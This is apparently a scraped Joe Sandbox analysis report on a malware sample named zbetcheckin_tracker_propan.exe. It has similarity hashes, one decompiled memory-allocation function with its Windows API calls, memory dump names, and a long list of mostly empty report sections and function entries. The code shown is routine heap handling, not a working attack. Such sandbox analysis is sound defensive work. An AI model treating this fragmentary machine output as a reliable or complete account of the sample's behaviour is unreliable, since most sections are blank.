Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Error$Last$Status$memcpymemset
String ID:
API String ID: 1551833903-0
Opcode ID: b3f4bb3f6c86a56d7e4b42c3487cbe3ce6be130a5c9ad4e3094e024aee6faca3
Instruction ID: d0833623cb9b424a463e9aacafeab85a9e0760c3cb7dcfda0f2a391c67fe8ec0
Opcode Fuzzy Hash: b3f4bb3f6c86a56d7e4b42c3487cbe3ce6be130a5c9ad4e3094e024aee6faca3
Instruction Fuzzy Hash: BB41BFB1504301AFD720DF65CE45B9BB7E8BB88314F00493EF598E22D0E7B4D9148B6A

Function 0040E568, Relevance: 5.1, APIs: 4, Instructions: 53
memory

C-Code - Quality: 100%

			E0040E568() {
				intOrPtr _t8;
				void* _t9;
				void* _t11;
				void* _t17;
				signed int _t19;
				intOrPtr* _t21;

				_t8 =  *0x436bf4; // 0x0
				_t19 =  *0x436be4; // 0x0
				if(_t19 != _t8) {
					L4:
					_t21 =  *0x436be8 + _t19 * 0x14;
					_t9 = HeapAlloc( *0x436214, 8, 0x41c4);
					 *(_t21 + 0x10) = _t9;
					if(_t9 == 0) {
						L2:
						return 0;
					}
					_t11 = VirtualAlloc(0, 0x100000, 0x2000, 4);
					 *(_t21 + 0xc) = _t11;
					if(_t11 != 0) {
						 *(_t21 + 8) =  *(_t21 + 8) | 0xffffffff;
						 *_t21 = 0;
						 *((intOrPtr*)(_t21 + 4)) = 0;
						 *0x436be4 =  *0x436be4 + 1;
						 *( *(_t21 + 0x10)) =  *( *(_t21 + 0x10)) | 0xffffffff;
						return _t21;
					}
					HeapFree( *0x436214, 0,  *(_t21 + 0x10));
					goto L2;
				}
				_t17 = HeapReAlloc( *0x436214, 0,  *0x436be8, (_t8 + 0x10) * 0x14);
				if(_t17 != 0) {
					 *0x436bf4 =  *0x436bf4 + 0x10;
					_t19 =  *0x436be4; // 0x0
					 *0x436be8 = _t17;
					goto L4;
				}
				goto L2;
			}

0x0040e568
0x0040e56e
0x0040e579
0x0040e5af
0x0040e5b2
0x0040e5c5
0x0040e5cd
0x0040e5d0
0x0040e599
0x00000000
0x0040e599
0x0040e5df
0x0040e5e7
0x0040e5ea
0x0040e5fe
0x0040e602
0x0040e604
0x0040e607
0x0040e610
0x00000000
0x0040e613
0x0040e5f6
0x00000000
0x0040e5f6
0x0040e58f
0x0040e597
0x0040e59d
0x0040e5a4
0x0040e5aa
0x00000000
0x0040e5aa
0x00000000

APIs

HeapReAlloc.KERNEL32(00000000,-00000010,00000001,00000000,0040EAC2,00000001,?,76ECE046,00000000,00000000,0040FA78,00000001,00000214), ref: 0040E58F
HeapAlloc.KERNEL32(00000008,000041C4,00000001,00000000,0040EAC2,00000001,?,76ECE046,00000000,00000000,0040FA78,00000001,00000214), ref: 0040E5C5
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 0040E5DF
HeapFree.KERNEL32(00000000,?), ref: 0040E5F6

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: e68206b2571ad2f33e4c0a726f1a4164fb77a1f21caaad09450859c6edacd99a
Instruction ID: a73b86c3c3e85fffb530331acd84b0771d661e4ca93faab2e0671b4a69d89a33
Opcode Fuzzy Hash: e68206b2571ad2f33e4c0a726f1a4164fb77a1f21caaad09450859c6edacd99a
Instruction Fuzzy Hash: C6119171548712BBC7218F65FD45956BBB5F7943207129D3AF2A2EB1F0D370A8108F68

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report zbetcheckin_tracker_propan.exe

Overview

General Information

Detection

Confidence

Classification

Signature Overview

AV Detection:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

Private

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: zbetcheckin_tracker_propan.exe PID: 2384 Parent PID: 2168

General

Chronological Activities

Analysis Process: iexplore.exe PID: 2296 Parent PID: 560

Function 004010ED, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 169
filestringthread

Function 0040C832, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 133
memory

Function 0040143E, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 195
native

Function 00401C7A, Relevance: 13.6, APIs: 4, Strings: 5, Instructions: 105
memorystring

Function 002D46DF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90
memory

Function 00290000, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 285
memory

Function 002DE040, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 226
librarynativeloader

Function 0040192F, Relevance: 6.1, APIs: 4, Instructions: 79
native

Function 004018F0, Relevance: 3.0, APIs: 2, Instructions: 28
native

Function 002D4D19, Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 259
memorystringtime

Function 0040FBFF, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 109
libraryloadermemory

Function 0040F98F, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 46
libraryloader

Function 0040F850, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 32
libraryloader

Function 0040F8BC, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 32
libraryloader

Function 002D1D31, Relevance: 10.6, APIs: 7, Instructions: 140
memorytime

Function 002D3B0F, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 104
memorystring

Function 00401DA8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
libraryloader

Function 002D102A, Relevance: 7.6, APIs: 5, Instructions: 56
memorylibraryloader

Function 0040FD83, Relevance: 7.6, APIs: 5, Instructions: 52
timethread

Function 0040FD83, Relevance: 7.6, APIs: 5, Instructions: 52
timethread

Function 00401000, Relevance: 7.5, APIs: 5, Instructions: 19
memory

Function 0040009E, Relevance: 7.3, APIs: 4, Instructions: 1345
memory

Function 00411650, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51
libraryloader

Function 0040E1B8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13
libraryloader

Function 004046A0, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 81
memory

Function 00401DFD, Relevance: 6.1, APIs: 4, Instructions: 69
file